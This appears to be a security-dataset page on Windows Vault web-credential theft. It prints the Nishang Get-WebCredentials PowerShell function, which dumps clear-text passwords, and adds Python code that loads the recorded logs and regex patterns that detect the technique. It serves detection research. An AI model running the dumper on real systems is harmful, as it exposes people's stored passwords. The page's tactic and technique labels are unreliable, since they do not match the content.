Windows Vault Web Credentials#

Metadata#

Contributors        Roberto Rodriguez @Cyb3rWard0g
Creation Date       2020/10/28
Modification Date   2020/10/28
Tactics             TA0004,TA0005
Techniques          T1055
Tags                None

Dataset Description#

This dataset represents a threat actor using PowerShell and the Windows Runtime PasswordVault class to access the Windows Vault (Credential Manager) and read the web credentials saved there, including the clear-text passwords.

Simulation Metadata#

Tools#

type    Name        Module
Manual  PowerShell  PowerShell

Adversary View#

Add Web Credentials
-------------------
PS > $pv = New-Object Windows.Security.Credentials.PasswordVault
PS > $pw = New-Object Windows.Security.Credentials.PasswordCredential('http://ossemproject.com', 'pgustavo', 'Pass@Word')
PS > $pv.Add($pw)

Import Get-WebCredentials
-------------------------
function Get-WebCredentials
{
  <#
  .SYNOPSIS
  Nishang script to retrieve web credentials from Windows Vault (requires PowerShell v3 and above)
  .DESCRIPTION
  This script can be used to retrieve web credentials stored in the Windows Vault from Windows 8 onwards. The script
  also needs PowerShell v3 onwards and must be run from an elevated shell.
  .EXAMPLE
  PS > Get-WebCredentials
  .LINK
  https://github.com/samratashok/nishang
  #>
  [CmdletBinding()] Param ()
  
  
  #http://stackoverflow.com/questions/9221245/how-do-i-store-and-retrieve-credentials-from-the-windows-vault-credential-manage
  # Referencing the type with ContentType=WindowsRuntime loads the WinRT projection so New-Object can instantiate the class
  $ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
  $VaultObj = new-object Windows.Security.Credentials.PasswordVault
  # RetrieveAll() returns the credentials with an empty Password property; RetrievePassword() fills in the clear-text secret
  $VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }
}

Run Get-WebCredentials
----------------------
PS C:\Users\wardog> Get-WebCredentials

UserName Resource                Password  Properties
-------- --------                --------  ----------
pgustavo http://ossemproject.com Pass@Word {[hidden, False], [applicationid, 00000000-0000-0000-0000-000000000000], ...


PS C:\Users\wardog>

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/psh_windows_vault_web_credentials.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

import pandas as pd

# The dataset is JSON lines (one event per line), hence lines=True
df = pd.read_json(datasetJSONPath, lines=True)

Access Security Events#

df.groupby(['Channel']).size().sort_values(ascending=False)
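The Adversary View above is what an analyst would look for in this dataset: a PowerShell session that instantiates Windows.Security.Credentials.PasswordVault and then calls RetrievePassword(), the call that actually decrypts the stored secret. The following is an added example, not part of the original page or the OTRF project, that takes the channel count from the last step and turns it into a small hunt over the JSON-lines events. It assumes PowerShell Script Block Logging was enabled on the host, so that the script text appears in Microsoft-Windows-PowerShell/Operational event 4104 under a ScriptBlockText field (field names Channel, EventID, ScriptBlockText, Hostname and NewProcessName are assumptions about the export schema). The events embedded below are constructed for the example; the same functions can be run on the real file by passing its contents to load_events.

```python
import json
import re
from collections import Counter

# Constructed sample events shaped like a JSON-lines export of Windows logs.
# Hostname, timestamps and values are made up for this example; the field
# names are assumptions about the export schema, not taken from the dataset.
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in [
    {"@timestamp": "2020-10-28T21:50:10.000Z", "Hostname": "WORKSTATION5.example.local",
     "Channel": "Security", "EventID": 4688,
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"@timestamp": "2020-10-28T21:50:12.000Z", "Hostname": "WORKSTATION5.example.local",
     "Channel": "Microsoft-Windows-PowerShell/Operational", "EventID": 4104,
     "ScriptBlockText": "$pv = New-Object Windows.Security.Credentials.PasswordVault"},
    {"@timestamp": "2020-10-28T21:50:15.000Z", "Hostname": "WORKSTATION5.example.local",
     "Channel": "Microsoft-Windows-PowerShell/Operational", "EventID": 4104,
     "ScriptBlockText": "$VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }"},
    {"@timestamp": "2020-10-28T21:50:20.000Z", "Hostname": "WORKSTATION5.example.local",
     "Channel": "Microsoft-Windows-PowerShell/Operational", "EventID": 4104,
     "ScriptBlockText": "Get-ChildItem -Path C:\\Users"},
])


def load_events(jsonl_text):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def channel_counts(events):
    """Events per log channel, the same view as df.groupby(['Channel']).size()."""
    return Counter(e.get("Channel", "") for e in events)


# Two stages of the technique. Touching the PasswordVault class is enumeration;
# RetrievePassword() is the call that returns the clear-text secret, so a hit on
# the second stage is the stronger signal.
VAULT_PATTERNS = {
    "vault_access": re.compile(r"Windows\.Security\.Credentials\.PasswordVault", re.IGNORECASE),
    "retrieve_password": re.compile(r"\.RetrievePassword\s*\(", re.IGNORECASE),
}


def classify_script_block(text):
    """Return the stages whose pattern appears in a script block, in stage order."""
    return [stage for stage, pat in VAULT_PATTERNS.items() if pat.search(text)]


def find_vault_access(events):
    """Return 4104 script-block events that touch the PasswordVault, tagged with the stage(s)."""
    hits = []
    for e in events:
        if e.get("Channel") != "Microsoft-Windows-PowerShell/Operational" or e.get("EventID") != 4104:
            continue
        stages = classify_script_block(e.get("ScriptBlockText", ""))
        if stages:
            hits.append({"timestamp": e.get("@timestamp"), "host": e.get("Hostname"),
                         "stages": stages, "script": e["ScriptBlockText"]})
    return hits


if __name__ == "__main__":
    events = load_events(SAMPLE_JSONL)
    for channel, n in channel_counts(events).most_common():
        print(f"{n:4d}  {channel}")
    for hit in find_vault_access(events):
        print(hit["timestamp"], hit["host"], ",".join(hit["stages"]), "|", hit["script"])
```

The check is deliberately tied to the script text rather than to a process name: the Nishang function can be pasted into any PowerShell host, and the same WinRT calls can be made from a compiled application where no 4104 event exists at all, so this signal only covers the PowerShell variant shown in the Adversary View and only when Script Block Logging is on.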